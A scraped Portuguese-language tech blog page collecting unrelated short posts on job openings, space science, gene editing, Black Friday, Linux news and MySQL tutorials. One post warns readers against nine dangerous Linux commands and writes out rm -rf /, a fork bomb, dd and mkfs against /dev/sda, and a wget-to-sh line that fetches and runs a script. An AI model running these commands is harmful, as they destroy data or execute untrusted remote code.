Clique para visualizar:

Concursos: 120 órgãos têm quase 20 mil vagas abertas em todo o país

Há oportunidades para todos os níveis de escolaridade.

Pelo menos 120 órgãos estão com inscrições abertas para concursos públicos. Ao todo, são quase 20 mil vagas em todo o país.

Há oportunidades para todos os níveis de escolaridade. O maior concurso é o do Mais Médicos, com 8.517 vagas. 
O Ministério da Saúde prorrogou as inscrições para 7 de dezembro.
Nesta segunda-feira (26), 10 órgãos abriram inscrições.
Veja abaixo detalhes dos concursos:
 (Crédito: Reprodução)
(Crédito: Reprodução)

Câmara Municipal de Paiva (MG)
Inscrições: até 26/12/2018
4 vagas
Salários de até R$ 1.118,35
Cargos de nível fundamental e médio

Guarda Municipal de Teresina (PI)
Inscrições: até 27/12/2018
75 vagas
Salários de até R$ 1.133,00
Cargos de nível médio

Itaipu Binacional
Inscrições: até 02/01/2019
46 vagas
Salários de até R$ 7.090,22
Cargos de nível médio e superior

Prefeitura de Água Boa (MT)
Inscrições: até 10/12/2018
131 vagas
Salários de até R$ 6.312,90
Cargos de nível fundamental, médio e superior

Prefeitura de Castelo (ES)
Inscrições: até 27/11/2018
20 vagas
Salários de até R$ 980,41
Cargos de nível médio

Prefeitura de Itarana (ES)
Inscrições: até 30/11/2018
11 vagas
Salários de até R$ 2.142,00
Cargos de nível médio e superior

Prefeitura de João Monlevade (MG)
Inscrições: até 30/11/2018
30 vagas
Salários de até R$ 1.010,02
Cargos de nível fundamental

Prefeitura de Cambuci (RJ)
Inscrições: até 21/12/2018
68 vagas
Salários de até R$ 1.176,34
Cargos de nível médio e superior

Prefeitura de Dracena (SP)
Inscrições: até 07/12/2018
13 vagas
Salários de até R$ 1.599,87
Cargos de nível médio e superior

Secretaria de Estado de Assistência Social do Pará
Inscrições: até 20/12/2018
9 vagas
Salários de até R$ 3.345,14
Cargos de nível médio e superior

Fonte: Com informações do G1

Sonda que vai mapear Marte 'por dentro' deve chegar hoje ao planeta

A sonda InSight, equipada com uma broca de quase 5 metros de comprimento e um sismógrafo, está se aproximando de Marte para iniciar uma missão de dois anos para mapear o interior do planeta, na tentativa de compreender como os planetas do Sistema Solar se formaram há mais de 4 bilhões de anos, informaram cientistas da NASA.
"A InSight vai explorar o interior profundo de Marte desde a crosta até o centro do planeta. Na verdade, é a primeira missão a ir e observar profundamente o interior de um outro planeta rochoso que não seja a Terra", disse Bruce Banerdt, o principal pesquisador da missão InSight, na quarta-feira (31).
Fantasma de Cassiopeia, uma nebulosa oficialmente conhecida como IC 63 e localizada à distância de 550 anos-luz da Terra na constelação de Cassiopeia
NASA mostra magia espacial em FOTO inédita de 'Fantasma de Cassiopeia'
Diferente de sondas anteriores, a InSight permanecerá em uma posição a partir da qual a espaçonave implantará um sismógrafo na superfície do planeta para medir os chamados "marsquakes" (vibrações de terremotos de Marte) e uma broca projetada para penetrar o solo marciano a uma profundidade de 3 a 5 metros, explicaram os cientistas da NASA. Ao estudar o tamanho, espessura, densidade e estrutura geral da crosta, núcleo e manto do Planeta Vermelho, assim como a taxa na qual o calor escapa do interior do planeta, a missão da InSight fornecerá relances dos processos evolutivos de todos os planetas rochosos no Sistema Solar, incluindo a Terra, segundo uma visão geral da agência espacial norte-americana.
A InSight está programada para pousar em Marte em 26 de novembro e começará a enviar dados para os próximos dois anos, anuncia a NASA.

Cientista chinês alega ter criado embrião geneticamente editado

Um cientista chinês afirmou hoje que ajudou a criar os primeiros bebés geneticamente manipulados do mundo, gémeas cujo ADN He Jiankui disse ter alterado com tecnologia capaz de reescrever o 'mapa da vida'.
 

A revelação foi feita pelo próprio em Hong Kong a um dos organizadores de uma conferência internacional sobre manipulação de genes que deve começar na terça-feira e, anteriormente, em entrevistas exclusivas à agência de notícias Associated Press (AP).
"A sociedade decidirá o que fazer a seguir", argumentou na entrevista.
O cientista, He Jiankui, da cidade de Shenzhen, disse que alterou os embriões durante os tratamentos de fertilidade de sete casais, tendo resultado numa gravidez até agora.
Jiankui afirmou que o objetivo não é curar ou prevenir uma doença hereditária, mas tentar criar uma capacidade de resistência a uma possível infeção futura de VIH-Sida.
O cientista adiantou que os pais envolvidos não quiseram ser identificados ou entrevistados e não disse onde estes moram ou onde o trabalho foi realizado.
Não há confirmação independente da reivindicação de He Jiankui, que tão pouco foi publicada ou examinada por outros especialistas.
Alguns cientistas ficaram espantados ao terem conhecimento da alegação e condenaram-na com veemência.
É "inconcebível... uma experiência em seres humanos que não é moralmente ou eticamente defensável", criticou um especialista em manipulação de genes da Universidade da Pensilvânia (Estados Unidos), Kiran Musunuru, e editor de uma revista de genética.
"Isso é prematuro demais", declarou o diretor do Scripps Research Translational Institute (estado norte-americano da Califórnia), Eric Topol.
No entanto, um famoso geneticista, George Church, da Universidade de Harvard (estado norte-americano do Massachusetts), defendeu a manipulação de genes para combater o vírus do VIH-Sida, que apelidou de "uma grande e crescente ameaça à saúde pública".
"Acho que isso é justificável", defendeu Church.
Nos últimos anos, os cientistas descobriram uma maneira relativamente fácil de manipular genes. A ferramenta, chamada de CRISPR-cas9, torna possível alterar o ADN para fornecer um gene necessário ou desativar um que esteja a causar problemas.
Só recentemente foi tentado em adultos para tratar doenças mortais, mas as mudanças estão confinadas a essa pessoa. A manipulação de espermatozoides, óvulos ou embriões é diferente, já que as alterações podem ser herdadas. A China proíbe a clonagem humana, mas não especificamente a manipulação de genes.
Jiankui estudou nas universidades de Rice e Stanford nos Estados Unidos antes de regressar à terra de origem para abrir um laboratório na Universidade de Ciência e Tecnologia do Sul da China, em Shenzhen, onde também tem duas empresas de genética.
Um cientista norte-americano garantiu ter trabalhado com Jiankui nesse projeto. Trata-se de um professor de física e bioengenharia, Michael Deem, que foi seu conselheiro na Universidade de Rice, em Houston. Deem também detém "uma pequena participação" nas duas empresas de Jiankui, disse.
O investigador chinês referiu que praticava a manipulação genética de ratos, macacos e embriões humanos no laboratório há vários anos e solicitou patentes sobre a sua metodologia.
He Jiankui acrescentou que optou por testar a manipulação genética de embriões para o VIH, porque o vírus é um grande problema na China.
O cientista tentou desativar um gene chamado CCR5, que forma uma porta proteica que permite que o VIH, o vírus que causa a Sida, entre numa célula.
Todos os homens do projeto tinham VIH, enquanto que todas as mulheres não, mas a manipulação genética não visava evitar o pequeno risco de transmissão, explicou.
Os pais tiveram as suas infeções profundamente reprimidas por medicamentos padrão para o VIH e existem maneiras simples de evitar que infetem descendentes que não envolvem a alteração de genes.
Em vez disso, a intenção era oferecer aos casais afetados pelo VIH a hipóteses de terem um filho que pudesse ser protegido de um destino semelhante.
He Jiankui recrutou casais através de um grupo de defesa de casos relacionados com o vírus da Sida, Baihualin, que tem a sua sede em Pequim.
O seu líder, conhecido pelo pseudónimo "Bai Hua", afirmou à AP que não é incomum na China que pessoas com VIH percam empregos ou que tenham problemas para obter assistência médica se as infeções forem divulgadas.

Mais Procurados Black Friday

Os itens mais comprados e buscados

Se você perguntasse para as pessoas próximas a você o que elas gostariam de comprar na Black Friday, pode ter certeza a maioria escolheria celulares, tênis e TVs, como indicavam as pesquisas próximas ao evento.
A ABComm confirma essa tendência, com o grande interesse concentrado nos setores de Informática, Celulares, Eletrônicos, Moda, Casa e Decoração. A plataforma de comércio eletrônico Rakuten Digital Commerce aponta que as vendas foram no comparativo com uma sexta-feira normal: os eletrodomésticos tiveram vendas até 2.000% maiores, seguidos dos alimentos e bebidas, com alta de 308%; Moda e Acessórios, com 255%; Cama, Mesa e Banho, com 198%; e Calçados, com 179%.
smartphones iphone celular
O levantamento da companhia de marketing digital e monitoramento online SEMrush mapeou 22,5 mil buscas por itens com desconto e o campeão foi o iPhone, com mais de 12,6 mil registros. Geladeiras e TVs ficaram em segundo lugar, com 5,4 mil pesquisas cada. Os notebooks ficaram em terceiro, com 4,4 mil; os consoles PlayStation 4 e XBox One acumularam 7,3 mil cada; e as passagens aéreas também se destacaram, com 2,4 mil ofertas procuradas.

Galera se atrapalhou com a “Black Fridey”

Fica aqui uma curiosidade: um número muito grande de consumidores ainda fica confuso com o nome e a pronúncia correta do evento. A SEMrush registrou que em geral o brasileiro busca certinho o “Black Friday”, termo procurado mais de 550 mil vezes.
Mas… Quem quiser vender mais é bom atualizar as tags, já que “Black Fridey” e “Black Fryday” somaram quase 19 mil buscas. “Black Flayder”, “Black Fride”, “Black Frid”, “Blak Friday”, “Black Freday” e “Black Fridy” também acumulam 19 mil. A forma tupiniquim “Black Fraidai” marcou presença, mais precisamente 1,3 mil vezes.

Smartphone Samsung Galaxy J6 SM-J600


Detalhes do Produto - Smartphone Samsung Galaxy J6 SM-J600 32GB 


Informações Básicas
TipoSmartphone
MarcaSamsung
LinhaGalaxy
ModeloJ6 SM-J600 32GB
ChipsDual Chip
CoresDourado, Prata, Preto
Câmera
Câmera Traseira13.0 Megapixels
Funções da CâmeraFlash
Câmera Frontal8.0 Megapixels Frontal
Tela
Tamanho da Tela5.93 polegadas
Tipo de TelaSUPER AMOLED
Resolução1480 x 720 Pixels
Hardware
ProcessadorExynos 7870
NúcleosOcta-Core (8 Núcleos)
Velocidade do Processador1.6 GHz
Memória Interna32 GB
Memória RAM2 GB RAM
EntradasFone de Ouvido, MicroSD
Software
Sistema OperacionalAndroid
VersãoOreo
Características e Conectividade
Internet4G, Wi-Fi
RecursosBluetooth 4.2, Rádio, TV Digital
Bateria
Bateria3000 mAh

Windows 10 vai espelhar seus apps Android em novo recurso

A Microsoft anunciou hoje (02) um novo recurso que vai permitir ao Windows 10 espelhar os aplicativos de um smartphone Android.


 Ao que parece, o recurso não deverá ter bloqueios: ou seja, o usuário vai conseguir usar qualquer aplicativo que roda no Android diretamente no Windows 10.
De acordo com a Microsoft, o espelhamento de aplicativos vai funcionar apenas com smartphones Android neste primeiro momento — e ainda não há indicações sobre o uso com iOS.
É possível acompanhar um curto vídeo de introdução sobre a ferramenta que a própria Microsoft publicou no Twitter do Windows. Segundo a empresa, o recurso estará disponível a partir de uma atualização ainda neste mês.

Veja:

https://twitter.com/Windows/status/1047224970403667969

9 Comandos perigosos linux que você deve conhecer para tomar cuidado

A linha de comando no GNU/Linux é muito produtiva, útil e interessante, no entanto, às vezes pode ser muito perigoso, principalmente se tratando do usuário root, ou do usuário que pode assumir a maioria dos seus privilégios, o sudo. É necessário saber exatamente o que está fazendo. Esse artigo serve para alertá-los sobre alguns comandos do terminal, para não executá-los.

 1. rm -rf
O comando rm -rf é um dos maneira mais rápida de eliminar uma pasta e seu conteúdo. Mas um pouco de erro de digitação ou ignorância pode resultar em danos no sistema irrecuperáveis. Algumas das opções usadas com o comando rm é:



rm -rf
comando rm no Linux é usado para apagar arquivos.
  • rm -r comando exclui a pasta de forma recursiva, mesmo a pasta vazia.
  • comando rm -f remove “apenas ler o arquivo ‘sem perguntar.
  • rm-rf / : Força eliminação de tudo no diretório raiz.
  • rm -rf * : Força eliminação de tudo no atual diretório diretório / trabalho.
  • rm -rf : Força supressão do atual diretórios e subdiretórios.
Por isso, tenha cuidado quando você está executando o comando rm -rf. Para evitar um acidente de excluir arquivos com o comando ‘rm’, crie um alias de comando ‘rm’ como ‘rm -i’ “.bashrc”, ele irá pedir-lhe para confirmar cada exclusão.

2. :(){:|:&};:



:(){:|:&};:
A descrição acima é o fork bomb. Ele opera através da definição de uma função chamada ‘:’, que se chama duas vezes, uma no primeiro plano e uma vez no fundo. Ele mantém em execução novamente e novamente até que o sistema congela.

3. comando > /dev/sda
O comando acima escreve a saída do ‘comando’ no bloco /dev/sda. O comando acima escreve dados brutos e todos os arquivos no bloco serão substituídos por dados brutos, resultando em perda total dos dados no bloco.

4. mv diretorio /dev/null
Tudo movido para /dev/null, desaparece do sistema.



mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

O comando acima irá baixar um script a partir de uma fonte mal-intencionada e, em seguida, executá-lo. Comando wget irá baixar o script e sh irá executar o script baixado.
Nota: Você deve ser muito consciente da fonte de onde você está baixando pacotes e scripts. Só use esses scripts/aplicações que é baixado de uma fonte confiável.
6. mkfs.ext3 /dev/sda



mkfs.ext3 /dev/sda
O comando acima irá danificar os blocos do seu HD, e formatá-lo.

7. > arquivo



echo "Nada" > arquivo.conf
Qualquer arquivo importante do sistema, será substituído com esse redirecionador.
A forma exata de usá-lo é criar um arquivo backup:



cp arquivo arquivo.bkp
e redirecionar com 2 “maiores que”, » , se necessário, exemplo para um source.list:



echo "link pacote deb" >> /etc/apt/source.list

8. ^foo^bar
Este comando é usado para editar o comando anterior sem a necessidade de digitar novamente todo o comando novamente. Mas isso realmente pode ser problemático se você não tomou o risco de verificar cuidadosamente a mudança no comando original usando ^ ^ foo comando bar.

9. dd if=/dev/random of=/dev/sda



dd if=/dev/random of=/dev/sda
O comando acima irá acabar com o /dev/sda e escrever dados aleatórios para o bloco. Claro! Seu sistema seria deixado na fase inconsistente e irrecuperável.

Linux pode ficar vulnerável após ameaça de desenvolvedores contra inclusão

Greg Kroah, líder do núcleo Linux, anunciou recentemente o novo código de conduta para desenvolvedores que trabalham com o sistema operacional Linux. De acordo com Kroah, a ideia é que os ambientes corporativos que utilizam o sistema se tornem mais “humanos”, de maneira “amigável e receptiva”. Enquanto Kroah acredita que os desenvolvedores devam ser pessoas mais abertas para o mundo, uma ala conversadora não concordou e pior: está ameaçando tornar o sistema operacional vulnerável.
No interesse de fomentar um ambiente aberto e receptivo, nós colaboradores estamos trabalhando para tornar nossa comunidade livre de perseguições

O novo código de conduta deixa claro o seguinte: "No interesse de fomentar um ambiente aberto e receptivo, nós colaboradores estamos trabalhando para tornar nossa comunidade livre de perseguições, independente de idade, estatura, deficiência, etnia, características sexuais, identidade de gênero, nível de experiência, escolaridade, situação socioeconômica, nacionalidade, aparência, raça, religião, identidade e orientação sexual".

Baseado no Contributor Covenant, um documento open-source já usado por outras plataformas de criação.

Agora, como nota o pessoal do Meio Bit, desenvolvedores insatisfeitos com essa nova realidade ameaçam remover as licenças de códigos inclusos em patches e módulos do kernel. Isso significa que, a longo prazo, o sistema se tornaria vulnerável a ataques.

Entre as novas regras do código, está o banimento de qualquer colaborador que não seja respeitoso com outras pessoas, independentemente de gênero, etnia, idade etc. A questão levantada pelos desenvolvedores, obviamente, envolve a comunidade LGBTQ+.
A alternativa da comunidade Linux seria o “kill switch”: remover o código

Por causa da versão GPL 2 da licença do Linux, os desenvolvedores possuem direitos autorais sobre os códigos que criam e compartilham. A ameaça ataca nesse tempo: caso sejam impedidos de contribuir, os desenvolvedores contra o código de conduta poderão reclamar a propriedade sobre os patches implementados.

Dessa maneira, a alternativa da comunidade Linux seria o “kill switch”: remover o código. A longo prazo, caso isso aconteça, o kernel do Linux ficará com buracos e deixará muitos cantos da internet totalmente inseguros. Companhias que rodam com o sistema também estariam mais vulneráveis a ataques.

Fonte: https://meiobit.com/391006/linux-codigo-conduta-atrito-entre-desenvolvedores/

NASA determina o que está movimentando 'silenciosamente' o eixo da Terra

Por que os eixos de outros planetas sofrem alterações significativas enquanto o da Terra permanece relativamente estável? E o que na realidade influencia a posição do eixo terrestre? Especialistas da NASA estão com as respostas


Um pequeno deslocamento do eixo terrestre, descoberto há algumas décadas, está ligado não só ao fim da Era do Gelo, mas também ao movimento de lava e à redistribuição da massa de água nos oceanos, concluem geólogos da NASA em um artigo publicado na revista Earth and Planetary Science Letters.
"Acreditava-se tradicionalmente que somente o fim da Era do Gelo seria o principal motivo dos recentes deslocamentos do eixo da Terra. Elaboramos um modelo digital do processo e revelamos que existe não só um, mas três fatos", contou Surendra Adhikari, do Laboratório de Propulsão a Jato.


Em comparação com outros planetas do Sistema Solar, a Terra possui um eixo relativamente estável. Graças à interação gravitacional do nosso planeta com a Lua, nos últimos bilhões de anos a posição do eixo não sofreu mudanças drásticas, enquanto os eixos de Marte e Urano, por exemplo, realocaram-se em dezenas de graus.

No entanto, dados científicos mostram que o eixo terrestre está se deslocando, pouco a pouco, mas se deslocando a um pouco mais de 10 cm/ano em direção ao 74º de longitude oeste. Sendo assim, grande parte dos pesquisadores passou a acreditar que o fim da Era do Gelo não seria o bastante para causar alteração.
Na verificação de outras hipóteses, Adhikari e seus colegas criaram um modelo especial digital para monitorar processos na litosfera e hidrosfera que poderiam interferir no eixo terrestre. Como resultado, eles descobriram que a atividade subterrânea afeta mais significativamente a posição do eixo do que a Era do Gelo um dia afetou.
Os cientistas indicam que a pressão e localização da camada de gelo, a atividade sísmica, o movimento de lava e a redistribuição de água nos oceanos e em outros reservatórios interferem no eixo terrestre. Portanto, vale a pena analisar o conjunto de fatores para fazer previsões climáticas e avaliar passíveis consequências do aquecimento global.

Facebook começa a testar seu sistema de paquera

Com o 'Dating', a rede social de Zuckerberg embarcou nesta semana em uma nova missão: fazer você achar o amor da sua vida




De todas as redes sociais que existem, dificilmente alguém vai citar o Facebook como uma das mais românticas. Faltam recursos que facilitem o sucesso de flertes e paqueras em geral – fora a tendência entre os mais jovens de cancelar as contas ou simplesmente manterem cada vez menos papos por lá.
Pare para pensar: fazer postagens ou comentários nas timelines é algo público além da conta. Você não sabe até quem o post vai chegar – e, portanto, só encaram tanta exposição os casais já estabelecidos, que querem mostrar seu amor para o mundo.
Para mensagens privadas já existe o Whatsapp, uma alternativa até mais completa que o Messenger, já que tem a vantagem de oferecer feedback de leitura em tempo real. Interações pelos stories do Instagram estão ficando progressivamente populares, justamente na parcela da população para a qual o Face já perdeu força. Isso sem falar de toda a sorte de apps criados exclusivamente para a paquera, como Tinder, Poppin, Happn, Grindr e equivalentes.
Se você está no Facebook faz tempo, deve lembrar das Cutucadas. Por um tempo, foi um recurso superpromovido pelo Facebook. Hoje, apesar de ainda existir, foi praticamente escondido. A verdade é que o botão de cutucar foi criado pelo Facebook como uma forma de iniciar conversas… Mas rapidamente ganhou má fama. Ele tende mais a fazer você parecer mais um stalker do que alguém que está tentando uma aproximação bem-intencionada.

Hacker encontra bug na Apple Pay e compra 500 iPhones a US$ 0,03

O engenheiro de computação Chang Chi-yuan encontrou uma falha na carteira digital da Apple, a Apple Pay, e conseguiu comprar 500 iPhones 8 Plus de 256 GB e dois iPhones Xs Max de 512 GB a 1 dólar taiwanês, o que é o equivalente a US$ 0,03 (R$ 0,12). No total, as mercadorias custam US$ 539 mil (quase R$ 2 milhões na conversão direta).
Chang diz que simplesmente arriscou pagar somente um dólar taiwanês por produto e, para sua surpresa, o sistema aceitou. Para comprovar sua proeza, ele até mesmo tirou cópias da tela de pagamento e postou em sua página no Facebook, veja:



Embora tenha conseguido esse baita “desconto”, Chang em seguida cancelou o pedido — talvez com medo de ter que arcar com os custos reais caso fosse descoberto.
O hacker — na verdade um cracker, que se dedica a quebrar sistemas de segurança — ficou famoso em 2013, quando deletou uma série de posts de Mark Zuckerberg na própria rede social, apenas para apontar uma brecha na plataforma depois de ser ignorado pelo suporte técnico. Ele mesmo já havia conseguido comprar um iPhone em 2016, após um bug semelhante do desta vez, uma falha que foi rapidamente corrigida na época.

Veja aqui no forensetux os 10 Hackers que marcaram à historia.

Revelado segredo do material mais rígido do Universo

A pasta nuclear, uma substância rara que se acredita existir em estrelas mortas ultradensas chamadas de estrelas de nêutrons, pode ser mais rígida do que qualquer outro material conhecido no Universo, revela novo estudo publicado na Physical Review Letters.
Para quebrar a pasta nuclear é necessária uma força 10 bilhões de vezes maior do que a empregada para romper o aço.

"Este é um número absurdamente alto, mas o material também é muito denso, o que ajuda a torná-lo mais forte", esclarece o coautor do estudo, Charles Horowitz, da Universidade de Indiana (EUA), citado pela Science News.
A pasta nuclear é incrivelmente densa, cerca de 100 trilhões de vezes a mais que a água. Os pesquisadores usaram simulações de computador para esticar as lâminas da "lasanha nuclear" e estudar como o material reagia. Pressões extremamente altas eram requeridas para deformar a substância e a pressão necessária para quebrá-la era maior do que a usada para quebrar qualquer outro material conhecido.
Simulações anteriores revelaram a força da crosta externa de uma estrela de nêutrons, mas a crosta interna, que abriga a pasta nuclear, era território inexplorado até agora.
"Agora, podemos ver que a crosta interna é muito mais forte", concluíram os pesquisadores do estudo.
Estrelas de nêutrons são formadas quando uma estrela moribunda explode, deixando um remanescente rico em nêutrons comprimido a pressões extremas por forças gravitacionais poderosas, resultando em materiais com propriedades estranhas.
Os cientistas esperam que, no futuro, com a ajuda do observatório de ondas gravitacionais com interferometria a laser LIGO, seja possível confirmar que as estrelas de nêutrons têm materiais extremamente fortes em suas crostas.
"Agora, podemos ver que a crosta interna é muito mais forte", concluíram os pesquisadores do estudo.

Como é criada?
Estrelas de nêutrons são formadas quando uma estrela moribunda explode, deixando um remanescente rico em nêutrons comprimido a pressões extremas por forças gravitacionais poderosas, resultando em materiais com propriedades estranhas.
Os cientistas esperam que, no futuro, com a ajuda do observatório de ondas gravitacionais com interferometria a laser LIGO, seja possível confirmar que as estrelas de nêutrons têm materiais extremamente fortes em suas crostas.

Polícia Civil busca quadrilha especializada em crimes cibernéticos

A Polícia Civil do Rio de Janeiro cumpre nesta segunda-feira (17) 45 mandados de prisão contra acusados de integrar uma quadrilha nacional especializada em crimes cibernéticos e lavagem de dinheiro. Os mandados estão sendo cumpridos em seis estados: São Paulo, Paraná, Minas Gerais, Santa Catarina e Bahia, além do Rio de Janeiro.
Os investigados foram denunciados pelo Grupo de Atuação Especial de Combate ao Crime Organizado (Gaeco), do Ministério Público do Rio de Janeiro, pela prática de crimes patrimoniais, com subtração de valores das contas bancárias por meio de transações fraudulentas, além de lavagem de dinheiro e organização criminosa.
Ao todo, 237 pessoas estão envolvidas no esquema fraudulento. Esta é a segunda etapa da Operação Open Doors, cuja primeira fase foi desencadeada em agosto de 2017.
Uma das fraudes aplicadas pelo grupo é o envio aleatório de e-mails e mensagens por celular a milhares de pessoas. As mensagens eram identificadas como sendo de instituições bancárias e pediam para que os clientes atualizassem suas senhas clicando em um endereço específico na internet.
Ao clicar nesses endereços, as vítimas eram direcionadas a websites com programas capazes de capturar informações de contas e senhas, que permitiam à quadrilha retirar quantias dessas contas de forma fraudulenta.
Outro golpe do grupo, que causava prejuízos ainda maiores segundo o Ministério Público (chegando a R$ 500 mil em alguns casos), era a ligação telefônica para potenciais vítimas. Os fraudadores se faziam passar por funcionários de bancos para obter dados pessoais. Entre os alvos estavam inclusive funcionários do setor financeiro de grandes empresas.
“Os integrantes da organização adotaram mecanismos para camuflar a origem ilícita do produto de seus crimes econômicos, na figura típica conhecida como lavagem de dinheiro, por meio da utilização de ‘laranjas’ na compra de terrenos, apartamentos e salas comerciais e para a ocultação de patrimônio”, diz nota do MP.

Linus Torvalds tira licença e pede desculpas por comportamento

O criador do sistema de código aberto Linux, Linus Torvalds, resolveu tirar uma licença temporária, conforme revelou em um longo e-mail enviado à comunidade da plataforma no domingo, 16/9. As informações são da CNBC.
Na mensagem em questão, aponta a rede americana, Torvalds pede desculpas pelo seu comportamento, que definiu como "não profissional e desnecessário", e diz que irá se afastar temporariamente para procurar ajuda.
“Preciso mudar parte do meu comportamento, e quero me desculpar com as pessoas que o meu comportamento pessoal possa ter machucado e possivelmente afastado totalmente do desenvolvimento do kernel”, afirmou.
Em outro trecho do e-mail, o criador do Linux diz que irá procurar por assistência durante esse período de licença. “Vou tirar um tempo de licença e buscar alguma ajuda sobre como compreender as emoções das pessoas e responder de forma apropriada.”
Por fim, Torvalds deixa claro que não quer se afastar da plataforma open-source. “Esse não é o tipo de coisa ‘Estou exausto, apenas preciso ir embora’. Não estou sentindo que não quero continuar mantendo o Linux. Totalmente o contrário. Eu realmente quero continuar fazendo esse projeto em que venho trabalhando há quase três décadas.”

DevOps entenda o que é

O que é DevOps” é uma pergunta mais difícil de se responder do que parece à primeira vista. Mas é possível apontar vários objetivos da prática de DevOps: velocidade e qualidade na entrega de valor, uso extensivo de automação para construção e testes, redução dos períodos em que as aplicações ficam fora do ar (downtimes),  eliminação do atrito entre desenvolvedores e operação e redução do tempo para lidar com falhas.
DevOps tem a meta principal melhorar a integração entre desenvolvedores de softwares e a equipe de infraestrutura. Em uma TI tradicional, a comunicação entre os dois sujeitos ainda é muito difícil: desenvolvedores são cobrados por entregar valor na forma de funcionalidades em aplicações, enquanto a operação (infra) é cobrada por manter a estabilidade do ambiente. Ambos são pressionados pela empresa em direção a esses objetivos, mas em uma TI tradicional eles parecem opostos.

Com o modelo de produção antigo este conflito é uma consequência natural: desenvolvedores têm pouco ou nenhum contato com o ambiente produtivo de suas entregas, assim como o formalismo imposto pelos silos operacionais tornam cada iteração uma repetição de problemas recorrentes.
Mas a prática e ferramental DevOps permitem que essa comunicação seja facilitada, modificando completamente as fronteiras de responsabilidade e favorecendo o trabalho de ambos os times, tornando muito mais fluida a entrega de valor no ambiente de tecnologia dentro de uma empresa.

Como era antes do DevOps?

Para começar a entender o modelo antigo de produção tecnológica, vamos lembrar do nosso ensino médio quando estudamos Revolução Industrial. Existia uma grande demanda por produtos manufaturados e foi necessária uma espécie de esteira de montagem para agilizar o processo.
Essa lógica também foi implementada na construção de software no modelo em cascata, que consistia no levantamento de requisitos, projeto, implementação, teste, implantação e manutenção. Frequentemente  (muito mesmo!) ele gerava problemas de toda ordem.
Um dos problemas é que a tecnologia possui um dinamismo avassalador, que faz com que os requisitos sejam alterados a todo o tempo. Outra dificuldade é que o cliente dificilmente sabe exatamente o que quer quando pede um software – e mesmo quando sabe, frequentemente está errado, pois o que o usuário final realmente precisa pode ser ainda diferente.
Por essa razão, fez-se necessária a criação de metodologias ágeis para conduzir projetos de software, e estas mesmas metodologias demandaram práticas e ferramentas totalmente diferentes das que estavam em uso até então, reordenando completamente as fronteiras que definiam os papéis de desenvolvimento e infraestrutura. Como dissemos no início do texto, não existe uma fórmula mágica de fazer DevOps, mas vamos indicar as práticas mais comuns e suas ferramentas. Confira abaixo!

União DevOps/Agile

Você se lembra quando falamos do problemático modelo de desenvolvimento em cascata? Ao longo dos anos várias outras metodologias foram experimentadas pela indústria de TI. Os métodos ágeis têm a hegemonia atual porque assumem explicitamente que a produção de aplicações é um ciclo contínuo e que o excesso de formalismo na coleta de requisitos é perda de tempo.
A prática DevOps possui algumas diretrizes: Algumas utilizam ferramentas que propiciam colaboração e integração contínua entre Desenvolvimento e Infraestrutura. Elaboramos um esquema abaixo que ilustra de forma resumida a adoção de DevOps, mas ao longo do nosso conteúdo explicaremos melhor pontos interessantes na hora de adotar a prática.

MySQL - função CONCAT

Combine valores dos registros e altere a exibição do relatório, com a função CONCAT

Você pode combinar a exibição de valores com a função CONCAT, dentro de um SELECT. Ao usar este recurso, o MySQL cria um novo campo (apenas para exibição), contendo os valores concatenados/combinados.
No exemplo abaixo vou mostrar como combinar os campos nome_projeto e data_inicio_projeto dentro de um novo campo, chamado Detalhes:


SELECT id_projeto, CONCAT('projeto ', nome_projeto, ' iniciado em ', data_inicio_projeto) 
AS Detalhes, valor_projeto FROM projetos WHERE valor_projeto > 3000000;
 
 +------------+------------------------------------------------------+---------------+
| id_projeto | Detalhes                                             | valor_projeto |
+------------+------------------------------------------------------+---------------+
|         13 | projeto Uppingham. Cottesmore iniciado em 19-11-2013 |       3483467 |
|         73 | projeto Lourdes iniciado em 24-05-2013               |       3489422 |
|         89 | projeto Moose Jaw iniciado em 19-06-2013             |       3119981 |
+------------+------------------------------------------------------+---------------+
3 rows in set (0.00 sec)

Para a lista não ficar muito extensa, no exemplo acima, restringi os projetos a serem exibidos aos que têm valores acima de 3000000.
A lista ficaria melhor, ainda, se as datas fossem exibidas em ordem ascendente:


SELECT id_projeto, CONCAT('projeto ', nome_projeto, ' iniciado em ', data_inicio_projeto) 
AS Detalhes, valor_projeto FROM projetos WHERE valor_projeto > 3000000 
ORDER BY data_inicio_projeto ASC;
 
 +------------+------------------------------------------------------+---------------+
| id_projeto | Detalhes                                             | valor_projeto |
+------------+------------------------------------------------------+---------------+
|         89 | projeto Moose Jaw iniciado em 19-06-2013             |       3119981 |
|         13 | projeto Uppingham. Cottesmore iniciado em 19-11-2013 |       3483467 |
|         73 | projeto Lourdes iniciado em 24-05-2013               |       3489422 |
+------------+------------------------------------------------------+---------------+
3 rows in set (0.00 sec)

MySQL - Exemplo de SELECT simples

A linguagem SQL foi criada com o objetivo de padronizar os comandos de manipulação de dados em SGBD’s. Hoje em dia, apesar de a linguagem possuir uma quantidade considerável de extensões e implementações proprietárias, pode-se afirmar que a meta foi alcançada. Conhecendo bem a linguagem é possível acessar os recursos básicos de qualquer banco relacional, como Oracle, SQL Server ou MySQL, sem praticamente nenhuma mudança.

O comando SELECT permite recuperar os dados de um objeto do banco de dados, como uma tabela, view e, em alguns casos, uma stored procedure (alguns bancos de dados permitem a criação de procedimentos que retornam valor). A sintaxe mais básica do comando é:

SELECT * FROM projetos;

Abaixo, você pode ver o resultado do comando (clique no ícone view source, no canto superior direito, para ver melhor)

+-----+------------+------------+----------------------+--------------------+------------------+
| id  | id_projeto | id_cliente | nome_projeto         | data_inicio_projeto | data_fim_projeto|                                                       
+-----+------------+------------+----------------------+--------------------+------------------+
|   1 |          1 |        557 | Forensetux           | 15-09-2013         | 09-09-2014       |                                                                   
|   2 |          2 |        863 | Kent                 | 18-06-2013         | 10-04-2014       | 
|   3 |          3 |        192 | Moradabad            | 10-04-2013         | 01-05-2014       |  
|   4 |          4 |        671 | Lithgow              | 15-07-2013         | 26-05-2014       | 
|   5 |          5 |        440 | Bowden               | 14-12-2013         | 07-03-2014       | 
+-----+------------+------------+----------------------+--------------------+------------------+
5 rows in set (0.14 sec)
 
 
O símbolo * significa all ou todas as colunas, neste caso.
Você pode especificar quais colunas, exatamente, deseja ver, ao descrevê-las no lugar do *.
No exemplo, abaixo, vou pedir para que apenas as colunas id_projeto e nome_projeto sejam exibidas:
SELECT id_projeto, nome_projeto FROM projetos;

E, como resultado, obtenho o seguinte:
+------------+----------------------+
| id_projeto | nome_projeto         |
+------------+----------------------+
|          1 | Forensetux           |
|          2 | Kent                 |
|          3 | Moradabad            |
